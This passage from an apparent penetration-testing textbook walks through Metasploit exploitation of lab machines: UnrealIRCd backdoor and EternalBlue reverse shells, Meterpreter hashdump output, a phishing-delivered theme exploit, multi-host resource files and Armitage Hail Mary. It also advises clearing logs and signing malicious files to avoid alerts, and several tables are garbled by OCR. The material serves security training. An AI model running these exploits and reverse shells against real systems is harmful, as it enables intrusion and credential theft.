• Logging in through cloud-based accounts; by default, some Windows

operating systems allow Microsoft accounts.

- Don't forget that guest accounts in legacy systems and locked accounts are used as service accounts to run scheduled jobs and other services.
- Print driver installation can help to bypass the security controls set on the machine. Attackers can potentially replace the driver installation with a malicious executable to provide a persistent backdoor to the system.
- Anonymous **Security Identification** (SID), named pipe, enumeration of the SAM accounts, this control is either applied to the system that is connected to the network via domain or standalone security settings.
- Remotely accessing the registry paths and subpaths.

Encryption

Encryption techniques engaged by Microsoft Windows are typically on password storage, NTLM sessions, and secure channel data.

Attackers are mostly successful in bypassing encryption, either by utilizing weaker cipher suites or disabling the feature itself.

System security

System-level security revolves around the main local system-level exploitation and the controls that are in place to bypass:

- Time zone synchronization: In most organizations, all the endpoints will sync their time with the primary domain; this provides the opportunity for an attacker to nullify evidence or track an exploit.
- Page file creating, locking pages in the memory, and create token object some of the token objects and page files run at system level. One of the classic attacks was a hibernation file attack.
- One of the first things that penetration testers must consider when they gain access to a target system with local admin privileges is to authenticate themselves to the domain, escalate the privileges, and add a user to the domain who can create global objects and symbolic links, which will provide full access to the domain.
- Load and unload device drivers and set firmware environment values.
- Automatic administrative logon enabled for all the system users.

Communications security

Typically, in communications security, the majority of the additional network devices come in place but with respect to Windows digitally signing the certificates and **Service Principle Name** (**SPN**) server, target name validation will be one of the notable things that penetration testers could utilize to develop a custom exploit. We will be exploring the exploitation of SPN in the next chapter.

Auditing and logging

Most of the default configuration controls that Windows can potentially put in place are to enable system logs. The following is the list of logs that can be enabled by any organization to utilize information during an incident/forensic analysis:

- Credential validation
- Computer account management
- Distribution group management
- Other account management level
- Security group management
- User account management
- Process creation
- Directive service access and changes
- Account lockout/logoff/logon/special logon
- Removable storage
- Policy changes
- Security state changes

This provides a clear view of what types of logs the penetration testers must consider clearing after the exploit phase in our kill chain methodology.

Summary

In this chapter, we took a deep dive into a systematic process for overcoming security controls set by organizations as part of their internal protection. We focused on different types of NAC bypass mechanisms, how to establish a connection to the external world using tunneling anbypassing the firewalls, and also learned about every level of network, application, and operating system controls to ensure that our exploits can successfully reach the target system. Additionally, we have reviewed how to bypass antivirus detection by utilizing Veil-Evasion and Shellter. We also saw how different Windows operating system security controls such as UAC, application whitelisting, and other Active Directory-specific controls put in place can be easily circumvented using the Metasploit framework.

In the next chapter, we will examine various means of exploiting systems, including both public exploits, exploit frameworks such as the Metasploit framework, Empire PowerShell project and craft Windows-based exploits.

Exploitation

Traditionally, a key purpose of a penetration test is to exploit a data system and gain the credentials or direct access to the data of interest. It is exploitation that gives penetration testing its meaning. In this chapter, we will examine various means of exploiting systems, including both public exploits and available exploit frameworks. By the end of this chapter, you should be able to understand the following:

- The Metasploit Framework
- The exploitation of targets using Metasploit
- Using one-line commands to take over the victim
- Using public exploits
- Developing sample Windows-specific exploits

The Metasploit Framework

The **Metasploit Framework** (**MSF**) is an open source tool that was designed to facilitate penetration testing. Written in the Ruby programming language, it uses a modular approach to facilitating exploits during the exploitation phase in kill-chain methodology. This makes it easier to develop and code exploits, and it also allows for complex attacks to be easily implemented.

The following screenshot depicts an overview of the MSF architecture and components:



The framework can be split into three main sections:

- Libraries
- Interfaces
- Modules

Libraries

MSF is built using various functions and libraries, as well as a programming language such as Ruby. To utilize these functions, first the penetration testers must understand what these functions are, how to trigger them, what parameters should be passed to the function, and what the expected results are.

All of the libraries are listed in the /usr/share/Metasploit-framework/lib/ folder, as shown in the following screenshot:

| root@kal | i:~# cd /usr/ | share/metasp. | loit-framewo | rk/lib/ |
|----------|----------------|---------------|--------------|-------------|
| anemone/ | / msf/ | rabal/ | snmp/ | telephony/ |
| metasm/ | net/ | rbmysql/ | sqlmap/ | xssf/ |
| metasplo | it/ postgres/ | rex/ | tasks/ | |
| root@kal | li:~# cd /usr/ | share/metasp | loit-framewo | rk/lib/msf/ |
| base/ | core/ scr | ipts/ ui/ | util/ | |
REX

REX is a library included in Metasploit that was initially developed by Jackob Hanmack and was made official by the Rapid 7 development team later on. This library provides various classes that are useful for exploit development. In the current MSF, REX handles all of the core functions such as socket connections, raw functions, and other reformatting.

Framework core

This library is located in /usr/share/metasploit-framework/lib/msf/core, which provides the basic **Application Programming Interface** (**API**) for all the new modules that are going to be written.

Framework base

This library provides a good API for sessions, a shell, Meterpreter, VNC, and other default APIs, but it is dependent on Framework-core.

Other extended parts that can be a part of MSF include the custom plugins, protocol tools, security tools, web services, and other integration services that can be utilized.

Interfaces

MSF used to have multiple interfaces, such as a command-line interface, web interface, and others. All of the interfaces were sunset by the Rapid 7 development team in the latest versions (Community and Pro). In this chapter, we will explore the console and GUI (Armitage) interfaces. The console interface is the fastest because it presents attack commands and it has the required configuration parameters in an easy-to-understand interface.

To access this interface, enter <code>msfconsole</code> in a command prompt. The following screenshot shows the splash screen that appears when the application launches:

| root@kali:~# msfconsole | |
|--|-------|
| IIIIII dTb.dTb II 4' v 'B .'"".'/\\`.""'. II 6P : .'/ \`. : II 'T: .P' '.' / \`.' II 'T: .P' '.' / \`.' II 'T: .P' '.' / \`.' | |
| | |
| I love shellsegypt | |
| =[metasploit v4.17.31-dev | 1 |
| +=[1843 exploits - 1074 auxiliary - 320 post | |
| +=[541 payloads - 44 encoders - 10 nops |] |
| +=[Free Metasploit Pro trial: http://r-7.co/try | msp] |

Modules

MSF consists of modules that are combined to affect an exploit. The modules and their specific functions are as follows:

- **Exploits**: The code fragments that target specific vulnerabilities. Active exploits will exploit a specific target, run until completed, and then exit (for example, a buffer overflow). Passive exploits wait for incoming hosts, such as web browsers or FTP clients, and exploit them when they connect.
- **Payloads**: These are the malicious code that implement commands immediately following a successful exploitation.
- Auxiliary modules: These modules do not establish or directly support access between the tester and the target system; instead, they perform related functions such as scanning, fuzzing, or sniffing, which support the exploitation phase.
- **Post modules**: Following a successful attack, these modules run on compromised targets to gather useful data and pivot the attacker deeper into the target network. We will learn more about the post modules in **Chapter 11**, *Action on the Objective and Lateral Movement*.
- **Encoders**: When exploits must bypass antivirus defenses, these modules encode the payload so that it cannot be detected using signature matching techniques.
- **No operations (NOPs)**: These are used to facilitate buffer overflows during attacks.

These modules are used together to conduct reconnaissance and launch attacks against targets. The steps for exploiting a target system using MSF can be summarized as follows:

- 1. Choose and configure an exploit (the code that compromises a specific vulnerability on the target system).
- 2. Check the target system to determine whether it is susceptible to attack by the exploit. This step is optional and is usually omitted to minimize the detection.
- 3. Choose and configure the payload (the code that will be executed on the target system following a successful exploitation; for example, a reverse

shell from the compromised system back to the source).

- 4. Choose an encoding technique to bypass detection controls (IDs/IPs or antivirus software).
- 5. Execute the exploit.

Database setup and configuration

It is fairly simple to set up the new version of Metasploit, since Metasploit does not run as a service anymore, since version msf3:

- 1. Start PostgreSQL by running systemctl start postgresql.service in the Terminal.
- 2. Initialize the Metasploit database by running msdb init. Unless it is your first time doing this, the initialization will create the msf database, create a role, and add the msf_test and msf databases in the /usr/share/metasploit-framework/config/database.yml configuration file; otherwise, by default, the msf database will be created in the prebuild of Kali Linux, as shown in the following screenshot:

root@kali:-# msfdb init
[i] Database already started
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

- 3. Now, you are ready to access msfconsole.
- 4. Once inside the console, you can verify the status of the database by typing db_status. You should be able to see the following:

msf > db_status [*] postgresql connected to msf

5. In the case of there being multiple targets, all of which are different company units, or maybe two different companies, it is a good practice to create a work space within Metasploit. This can be achieved by running the workspace command in the msfconsole. The following extract shows the help menu, where you can add/delete workspaces so that you can organize these exploits to achieve your objective:

```
msf > workspace -h
Usage:
    workspace    List workspaces
    workspace -v    List workspaces verbosely
    workspace [name]    Switch workspace(s)
    workspace -d [name] ... Delete workspace(s)
```

```
workspace -D Delete all workspaces
workspace -r <old><new> Rename workspace
workspace -h Show this help information
msf > workspace -a ThirdEdition
[*] Added workspace: ThirdEdition
msf > workspace
default
ThirdEdition
*client1 (* indicates the workspace that you are connected)
```

The following example represents a simple **Unreal IRCD** attack against the target Linux-based operating system. When installed as a virtual machine (covered in chapter 1, *Goal-Based Penetration Testing*), Metasploitable3 can be scanned using db_nmap command, which identifies open ports and associated applications. An excerpt of the db_nmap scan is shown in the following screenshot:



Several applications were identified by nmap in the preceding example. If the scan was completed using nmap separately, those results can also be imported into Metasploit using the db_import command. The nmap output will normally produce three types of output, that is, xml, nmap, and gnmap. The .xml format can be imported into the database using the Nmap nokogiri parser. Once the results have been imported into the database, multiple options can be utilized in the case of a large nmap dataset:

| msf | <pre>> db import /root/chap10/Target.xml</pre> |
|-----|---|
| [*] | Importing 'Nmap XML' data |
| E*3 | Import: Parsing with 'Nokogiri v1.8.5' |
| [*] | Importing host 192.168.0.16 |
| [*] | Successfully imported /root/chap10/Target.xml |

As a tester, we should investigate each one for any known vulnerabilities. If we run the services command in the msfconsole, the database should include the host and its listed services, as shown in the following screenshot:

| <pre>services</pre> | 15 | | | | |
|---------------------|-------|-------|-------------|--------|---|
| host | port | proto | name. | state | into |
| 192.158.0.16 | 51 | tion | the | cloned | |
| 192.168.0.16 | 22 | tep | ⇒sn. | upen. | openssm 6.6.1pl ubuntu 2ubuntu2.10 ubuntu Limux) protocol 2.0 |
| 192.168.0.16 | 80 | ten | bttp. | open | Abache httpd 2.4.7 |
| 192.168.0.16 | 445 - | tep | netbios-sam | open | Samba ambd 3.K - 4.X workgroup; WORKGROUP |
| 192.168.0.16 | 631 | tep. | 1pp | open | CUPS 1.7 |
| 192,168.0.16 | 3000 | tep | ppp | closed | |
| 192.168.0.16 | 3306 | tep. | nysql | opan | MySQL unauthorized |
| 192.168.0.16 | 3500 | tep. | http | open | WEBrick httpd 1.3.1 Huby 2.3.7 (2018-03-28) |
| 192.168.0.16 | 6697 | t.cp. | 1rc - | open | Unrealtpod |
| 192,168.0.16 | 0181 | tep | http: | open | MEBrick httpd 1.3.1 Emby 2.3.7 (2018-03-28) |

One of the first places to start is Metasploit's own collection of exploits. This can be searched from the command line using the following command:

msf> search UnrealIRCd

The search returned a particular exploit for the UnrealIRCd service. The following screenshot shows an excerpt of the exploit that's available. If the testers choose to exploit any other listed service, they can search for keywords in Metasploit:



The exploit/unix/irc/unreal_ircd_3281_backdoor exploit was selected for use in the remainder of this example because it is ranked as excellent. This ranking was determined by the Metasploit development team and identifies how reliably the exploit works for a skilled tester against a stable target system. In real life, multiple variables (tester skills, protective devices on the network, and modifications to the operating system and hosted applications) can work together to significantly alter the reliability of the exploit.

Additional information pertaining to that exploit was obtained using the following info command:

msf> info exploit/unix/irc/unreal_ircd_3281_backdoor

The returned information includes references as well as the information that's shown in the following screenshot:

```
msf > info exploit/unix/irc/unreal ircd 3281 backdoor
       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
     Module: exploit/unix/irc/unreal ircd 3281 backdoor
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-06-12
Provided by:
  hdm <x@hdm.io>
Available targets:
  Id Name
     Automatic Target
  0
Check supported:
  No
Basic options:
         Current Setting Required Description
  Name
                                    The target address
  RHOST
                          yes
  RPORT 6667
                                    The target port (TCP)
                          yes
```

To instruct Metasploit that we will attack the target with this exploit, we issue the following command:

msf> use exploit/unix/irc/unreal_ircd_3281_backdoor

Metasploit changes the command prompt from msf> to msf

exploit(unix/irc/unreal_ircd_3281_backdoor) >.

Metasploit prompts the tester to select the payload (a reverse shell from the compromised system back to the attacker) and sets the other variables, which are listed as follows:

- **Remote host (RHOST)**: This is the IP address of the system being attacked.
- **Remote port (RPORT)**: This is the port number that is used for the exploit. In this case, we can see that the service has been exploited on default port 6667, but in our case the same service is running on port 6697.
- Local host (LHOST): This is the IP address of the system that's used to launch the attack.

The attack is launched by entering the exploit command at the prompt after all variables have been set. Metasploit initiates the attack and confirms that a reverse shell. In other exploits, a successful exploit is presented by using command shell 1 opened and giving the IP addresses that originate and terminate the reverse shell.

To verify that a shell is present, the tester can issue queries for the hostname, username (uname -a), and whoami to confirm that the results are specific to the target system that is located at a remote location. Take a look at the following screenshot:

```
nsf exploit(unix/irc/unreal ircd 3281 backdoor) > set rhost 192.168.0.16
rhost -> 192.168.0.16
msf exploit (unix/irc/unreal ircd 3281 backdoor) > set payload cmd/unix/reverse
payload -> cmd/unix/reverse
msf exploit(unix/irc/unreal ircd 3281 backdoor) > set lhost 192.168.0.24
1host -> 192.168.0.24
msf exploit(unix/irc/unreal ircd 3281 backdoor) > set 1port 6697
lport -> 6697
maf exploit (unix/irc/unreal ircd 3281 backdoor) > exploit
Started reverse TCP double handler on 192.168.0.24:6697
192.168.0.16:6697 - Connected to 192.168.0.16:6697...
    :irc.TestIRC.net NOTICE AUTH :*** Looking up your hostname...
 192.168.0.16:6697 - Sending backdoor command...
 Accepted the first client connection...
 Accepted the second client connection...
 Command: echo DTUsa03iBJX0Mes8;
 *] Writing to socket A
 *] Writing to socket B
 *] Reading from sockets...
  ] Reading from socket A
  A: "DTUsaO3iBJX0Mes8\r\n"
 *] Matching ...
 B is input...
hostname
metasploitable3-ub1404
Whoami
boba fett
uname -a
Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08
```

This exploit can further be explored by using post exploit modules. Run the Meterpreter in the background by pressing Ctrl + Z. You should receive Background session 1? [y/N] y enter y.

When a system is compromised to this extent, it is ready for the post exploitation activities (see **Chapter 11**, Action on the Objective and Lateral Movement, and **Chapter 13**, Command and Control, to find out how to escalate the privilege and maintain access to the system).

Exploiting targets using MSF

MSF is equally effective against vulnerabilities in the operating system as well as third-party applications. We will take an example for both scenarios.

Single targets using a simple reverse shell

In this example, we'll exploit a buffer overflow exploit called DoublePulsar, which was designed particularly for the systems that are vulnerable to EternalBlue, which rocked the world with Wannacry ransomware in April, 2017. The vulnerability exists in the way that the SMB version was implemented in Windows—specifically, SMBv1 and NBT over TCP ports 445 and port 139—which is used to share data in an insecure way. Exploitation results in arbitrary code execution under the context of the system user.

To initiate the attack, the first step is to open <code>msfconsole</code> and set Metasploit to <code>use</code>, as shown in the following screenshot:

```
nsf > use exploit/windows/smb/ms17 010 eternalblue
nsf exploit (windows/smb/ms17 010 eternalblue) > set payload windows/x64/meterpreter/reverse https
payload => windows/x64/meterpreter/reverse https
nsf exploit (windows/amb/ms17 010 eternalblue) > set rhost 192,168.0.115
rhost => 192,168.0.115
nsf exploit(windows/smb/ms17 010 eternalblue) > set lhost 192.168.0.24
lhost => 192.168.0.24
nsf exploit (vindows/smb/ms17 010 eternalblue) > set Iport 443
lport => 443
nsf exploit (windows/smb/ms17 010 eternalblue) > exploit
   Started HTTPS reverse handler on https://192.168.0.24:443
 [*] 192.168.0.115:445 - Connecting to target for exploitation.
(+) 192.168.0.115:445 - Connection established for exploitation.
[+] 192,168.0.115:445 - Target OS selected valid for OS indicated by SMB reply
 192.168.0.115:445 - CORE raw buffer dump (51 bytes)
   192.168.0.115:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
   192.168.0.115:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
192.168.0.115:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
192.168.0.115:445 - 0x00000030 6b 20 31
                                                                                    k 1
[+] 192.168.0.115:445 - Target arch selected valid for arch indicated by DCE/RPC reply
 192.168.0.115:445 - Trying exploit with 12 Groom Allocations.
   192,168.0.115:445 - Sending all but last fragment of exploit packet
   192.168.0.115:445 - Starting non-paged pool grooming
[+] 192.168.0.115:445 - Sending SMBv2 buffers
[+] 192.168.0.115:445 - Closing SMBvI connection creating free hole adjacent to SMBv2 buffer.
 192.168.0.115:445 - Sending final SMBv2 buffers.
   192.168.0.115:445 - Sending last fragment of exploit packet!
192.168.0.115:445 - Receiving response from exploit packet.
[+] 192.168.0.115:445 - STERNALBLUE overwrite completed successfully (0xC0000000)!
   192.168.0.115:445 - Sending egg to corrupted connection.
```

Again, the exploit is a relatively simple exploit. It requires the tester to set a reverse shell (reverse_tcp) from the compromised system back to the tester's system, the LHOST.

When the exploit is completed, it opens up the Meterpreter reverse shell between two systems. The Meterpreter prompt session will be opened up and the tester can effectively access the remote system with a command shell. One of the first steps after the compromise is to verify that you are on the target system. As you can see in the following screenshot, the sysinfo command identifies the computer name and operating system, verifying a successful attack:

| meterpreter > sy | ys: | lnfo | | |
|------------------|-------------------|--|--|--|
| Computer | : METASPLOITABLE3 | | | |
| OS | : | Windows 2008 R2 (Build 7601, Service Pack 1) | | |
| Architecture | : | x64 | | |
| System Language | : | en US | | |
| Domain | : | MASTERING | | |
| Logged On Users | : | 2 | | |
| Meterpreter | | x64/windows | | |

The hashdump command should disclose all the usernames and password hashes, as shown in the following screenshot:

| <pre>meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: aen_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:d60f9a4855da4feadaf160e97d200dc5::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:020536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0720536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:07d20b46c4aa690171ba066c037397ee::: dath_vader:1010:aad3b435b51404eeaad3b435b51404ee:07d20b46c4aa690171ba066c037397ee::: farth_vader:1010:aad3b435b51404eeaad3b435b51404ee:07d20b46c4aa690171ba066c037397ee::: atrto_tad53b435b51404eeaad3b435b51404ee:073a851feecff7acafbaa4a806aea3e0::: pred0:1016:aad3b435b51404eeaad3b435b51404ee:073a851feecff7acafbaa4a806aea3e0::: nacker:1019:aad3b435b51404eeaad3b435b51404ee:3066231b73c59d7e0c089c0::: nacker:1019:aad3b435b51404eeaad3b435b51404ee:93ac4eaa63d63565f37c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:e07d0a4ee:93ec4eaa63d63565f37c17c8d9ec76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:e07d0a3240331e94ae18b001::: lando_calrizeian:1013:aad3b435b51404eeaad3b435b51404ee:e02085898f2d7db11cfb670042a53f::: lando_calrizeian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: lando_calrizeian:1013:aad3b435b51404eeaad3b435b51404ee:806163d3240324032205205427db11cfb670042a53f::: lando_calrizeian:1013:aad3b435b51404eeaad3b435b51404ee:8066881cce203621cr9cfa6f21f14028::: luks_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:8066881cce203621cr9cfa6f21f14028::: sahd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</pre> |
|--|
| sshd:1001:aad3b435b51404eeaad3b435b51404ee;31d6cfe0d16ae931b73c59d7e0c089c0;;; sshd_server:1002:aad3b435b51404eeaad3b435b51404ee;8d0a16cfc061c3359db455d00ec27035;;; vagrant:1000:aad3b435b51404eeaad3b435b51404ee;e02bc503339d51f71d913c245d35b50b;;; |

Furthermore, to store this information for the enhancement of lateral movement within the network, testers can utilize the loot command in the msfconsole. The loot command in Meterpreter will export all of the password hashes and account information into a local database in the case of a single system or multiple system compromise.

Single targets using a reverse shell with a PowerShell attack vector

In this section, we will take an example of similar exploitation. However, the vulnerability will exist in handling the screensaver path in which the arbitrary path can be used as the screensaver. This allows the attackers to run remote code execution. If the victim is away from their computer and if the screensaver is set to run, that is, Windows is trying to access the screensaver at regular intervals, the same exploit will be run every time.

We will be using ms13_071_theme, which initially affected only Windows XP and Windows 2003. However, it still works on Windows 7 and Windows 2008. Now let's equip Metasploit with all the required information such as payload, lhost, and lport, which are filled and ready to exploit, as shown in the following screenshot:



In this exploit, we will be using the PowerShell attack vector for the ReverseShell, so we will be using the windows/powershell_reverse_tcp payload.

The next step is to have the victim open the link through SMB; the means of dropping the exploit can be phishing or other social engineering techniques. Once the victim opens the link, some of the users may be alerted, as shown in the following screenshot:



So, for penetration testers, it is recommended to sign the .scr files as a legitimate internal user. The next step occurs when the user clicks on Run—that's it. This has now opened up a ReverseShell to the attacker with PowerShell, which allows attackers to run PowerShell commands on the victim system and escalate the privilege to the domain:

```
msf exploit(Windows/fileformat/ms13_071_theme) > sessions -i 3
[*] Starting Interaction with 3...
Windows PowerShell running as user vagrant on METASPLOITABLE3
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS Microsoft.PowerShell.Core\FileSystem::\\192.168.0.24\LiQUI>get-executionpolicy
Bypass
PS Microsoft.PowerShell.Core\FileSystem::\\192.168.0.24\LiQUI> whoami
metasploitable3\vagrant
PS Microsoft.PowerShell.Core\FileSystem::\\192.168.0.24\LiQUI> dir
```

Exploiting multiple targets using MSF resource files

MSF resource files are basically line-separated text files that include a sequence of commands that need to be executed in <code>msfconsole</code>. Let's go ahead and create a resource file that can exploit the same vulnerability on multiple hosts:

```
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.0.166
set lhost 192.168.0.137
set lport 4444
exploit -j
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.0.119
set lhost 192.168.0.137
set lport 4442
exploit -j
```

Save the file as doublepulsar.rc. Now you are ready to invoke the resource file by running msfconsole -r filename.rc, where -r refers to the resource file. The preceding resource file will exploit the same vulnerability sequentially. Once the first exploit is complete, the specification of exploit -j will move the running exploit to the background, allowing the next exploit to proceed. Once all of the targets' exploitation is complete, we should be able to see multiple Meterpreter shells available in Metasploit.



If the exploit is designed to run only on one host, it may not be possible to enter multiple hosts or IP ranges to the exploit. However, the alternative is to run the same exploit with different lport numbers per host. We will be discussing more on pre-existing MSF resource files that can be utilized while escalating privileges in the next chapter.

Exploiting multiple targets with Armitage

Armitage is frequently overlooked by penetration testers who eschew its GUI interface in favor of the traditional command-line input of the Metasploit console. However, it possesses Metasploit's functionality while giving visibility to its many possible options, making it a good alternative in complex testing environments. Unlike Metasploit, it also allows you to test multiple targets at the same time—up to 512 targets at once.

To start Armitage, ensure that the database and Metasploit services are started using the following command:

service postgresql start

After that step, enter armitage on the command prompt to execute the command. Armitage does not always execute cleanly and it may require the launch steps to be repeated to ensure that it is functioning correctly.

To discover the available targets, you can manually add a host by providing its IP address or selecting an nmap scan from the Hosts tab on the menu bar. Armitage can also enumerate targets using MSF auxiliary commands or DNS enumeration.

Armitage can also import host data from the following files: Acunetix, amap, AppScan, Burp proxy, Foundstone, Microsoft Baseline Security Analyzer, Nessus NBE and XML files, NetSparker, NeXpose, Nmap, OpenVas, Qualys, and Retina.

The initial Armitage start screen is shown in the following screenshot:



Armitage allows you to set a host label by right-clicking and selecting a host, and then going to the Host menu and selecting the Set Label... function. This allows you to flag a particular address or identify it by a common name, which is helpful when using team-based testing. This process is shown in the following screenshot:



Armitage also supports dynamic workspaces—a filtered view of the network

based on network criteria, operating system, open ports and services, and labels. For example, you may test a network and identify several servers that do not appear to be patched to the extent of the remainder of the network. These can be highlighted by giving them a label and then placing them in a priority workspace.

Once you have identified the target systems that are present on a network, you can select specific modules to implement as part of the exploitation process. You can also use the Attacks option in the menu bar to find attacks.

To exploit a host, right-click and navigate to the Attack item, and choose an exploit. (Make sure that the operating system is set for the correct host; this does not always happen automatically.)

One interesting option is Hail Mary, which is located under the Attacks option. By selecting this function, all of the identified systems are automatically subject to exploits to achieve the greatest number of possible compromises, as shown in the following screenshot:

| Console X Hail Mary X |
|---|
| <pre>[*] Finding exploits (via local magic)</pre> |
| <pre>[+] 192.168.0.115: found 92 exploits</pre> |
| [+] 192.168.0.16: found 439 exploits |
| [*] Sorting Exploits |
| [*] Launching Exploits |
| <pre>[*] 192.168.0.16:80 (unix/webapp/jquery_file_upload)</pre> |
| <pre>[*] 192.168.0.16:80 (multi/http/navigate_cms_rce)</pre> |
| [*] 192.168.0.115:8080 (multi/http/struts2_namespace_ognl) |
| <pre>[*] 192.168.0.16:80 (multi/http/cmsms_upload_rename_rce)</pre> |
| <pre>[*] 192.168.0.115:8181 (windows/http/manageengine_adshacluster_rce)</pre> |
| <pre>[*] 192.168.0.16:80 (unix/http/quest_kace_systems_management_rce)</pre> |
| <pre>[*] 192.168.0.16:80 (multi/http/oscommerce_installer_unauth_code_exec)</pre> |
| <pre>[*] 192.168.0.16:80 (multi/http/gitlist_arg_injection)</pre> |
| [*] 192.168.0.16:80 (unix/webapp/drupal_drupalgeddon2) |
| <pre>[*] 192.168.0.16:80 (multi/http/clipbucket_fileupload_exec)</pre> |
| <pre>[*] 192.168.0.16:80 (multi/http/monstra_fileupload_exec)</pre> |
| <pre>[*] 192.168.0.16:80 (unix/http/epmp1000_get_chart_cmd_shell)</pre> |
| Listing sessions in 17 seconds |

This is a very noisy attack and should therefore be used as a last resort test choice. It is also an excellent way to determine whether an intrusion detection system is implemented and configured properly or not.

A system that is compromised shows up as an icon with a red border with electrical sparks. In the following screenshot, two test systems have been compromised and there are four active sessions in place between these systems and the tester. The Active Sessions panel indicates the connections and identifies what exploit was used to compromise the target. Take a look at the following screenshot to see what represents the different options:



During a penetration test that was conducted, the Hail Mary option identified two exploitable vulnerabilities with the target and initiated two active sessions. Manual testing with the same target eventually identified eight exploitable vulnerabilities, with multiple communication channels between the compromised system and the tester. Real-world tests of this type reinforce the advantages and weaknesses of automated tools during the penetration testing process.

Using public exploits

Every attack always has eyes out, looking for public exploits and modifying them according to their requirements. The latest exploit was on April 14, 2017, that is, EternalBlue, which rocked the entire internet world, thus creating an awareness of what ransomware malware is all about. However, in this section, we will take a deep dive into utilizing the known available exploit forums and also how we can onboard them into our Kali Linux system.

Locating and verifying publicly available exploits

Many a time, penetration testers find a zero-day exploit during their tests, which they normally inform the company of. However, in the real case of attackers, any vulnerabilities that are found will be made into an exploit, which is then sold for money/fame. One of the important aspects of penetration testing is to find publicly available exploits on the internet and provide proof of concept.

The initial exploit database that was born on the internet was Milw0rm. Using the same concept, we can see multiple similar databases that can be utilized by the penetration testing community. The following are the list of places where attackers would primarily look for exploits:

- **Exploit-DB** (**EDB**): The name says it all—it is a database archive of public exploits on the internet, along with the software versions that are vulnerable. EDB was developed by vulnerability researchers and penetration testers, who are driven by the community. Penetration testers often use Exploit-DB as a proof of concept rather than an advisory, making it more valuable during a penetration test or Red teaming exercise:
 - EDB is embedded into Kali Linux 2.0 as part of the build release and it has made it fairly simple to search for all the available exploits through searchsploit. The advantage of EDB is that it's also **common vulnerabilities and exposures (CVEs)** compatible. Wherever applicable, the exploits will include the CVE details.
- **Searchsploit ftp windows remote**: Searchsploit is a simple utility in Kali Linux for finding all the exploits from EDB, with a keyword search to narrow down an attack. Once you open the Terminal and type searchsploit, you should be able to see the following:

| routikali:-# searchaploit ftp windows remote | |
|--|---|
| Exploit 7itle | Path {/usr/share/axplsitsh/} |
| <pre>Gebriel's FTP Server) Open & Compact FTP Server 1.2 - 'POST' Sence Denial of s (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / D (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access (Gabriel's FTP Server) Open & Compact FTP d 1.2 - Unauthenticated Buncte Gverflow (Gabriel's FTP Server) Open & Compact FTP d 1.2 - Unauthenticated Buncte Gverflow (Gabriel's FTP Server) Open & Compact FTP d 1.2 - Unauthenticated Buncte Gverflow (Gabriel's FTP Server) Open & Compact FTP d 1.2 - Unauthenticated Buncte Gverflow (Gabriel's FTP Server) Open & Compact FTP d 1.2 - Unauthenticated Buncte Gverflow (Gabriel's FTP 109.04.24) - 'Banner' Remote Buffer Overflow (Izbit FTP 109.04.24) - 'Banner' Remote Buffer Overflow (Izbit FTP 109.04.24) - 'COU Response' Onlymeral Overfure (SEM)</pre> | <pre>(exploits/windows/dos/12600.py (exploits/windows/temote/1301.py) exploits/windows/temote/1302.py (exploits/windows/temote/1142.rb) exploits/windows/temote/11420.py (exploits/windows/temote/11420.py (exploits/windows/temote/11420.py (exploits/windows/temote/613.py (exploits/windows/temote/8613.py (exploits/windows/temote/8613.py (exploits/windows/temote/8613.py (exploits/windows/temote/8621.ps)</pre> |

- **SecurityFocus**: SecurityFocus is another source of information where all of the publicly disclosed vulnerabilities are published, along with their CVEs:
 - Let's start by navigating to www.securityfocus.com and searching all of the vulnerabilities. Now, the attackers should be able to see the following screenshot, which allows the penetration testers to find all of the disclosed vulnerabilities for all of the products:

| $\leftrightarrow \Rightarrow {\tt G}$ | (i) www.securityfocus.com/vulnerabilities | |
|--|---|--------------------------|
| Sec | urity Focus [™] | |
| Symant A technical Join the co | cec Connect community for Symantec customers, end-users, d nversation > | evelopers, and partners. |
| Vulnerabilitie | S | (Page 1 of 3065) |
| Vendor: | Select Vendor | |
| Title: | Select Title 🔻 | |
| Version: | Select Version V | |
| Search by C | VE | |
| CVE: | | |
| | Submit | |

• In SecurityFocus, all of the reported vulnerabilities are stored in the form of a bid. It mainly includes the sections that are shown in the following screenshot for every vulnerability:

| info | discussion | exploit | solution | references |
|---|--|---------|----------|--|
| The second se | and the second sec | | | Contraction of the second seco |

Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability

References:

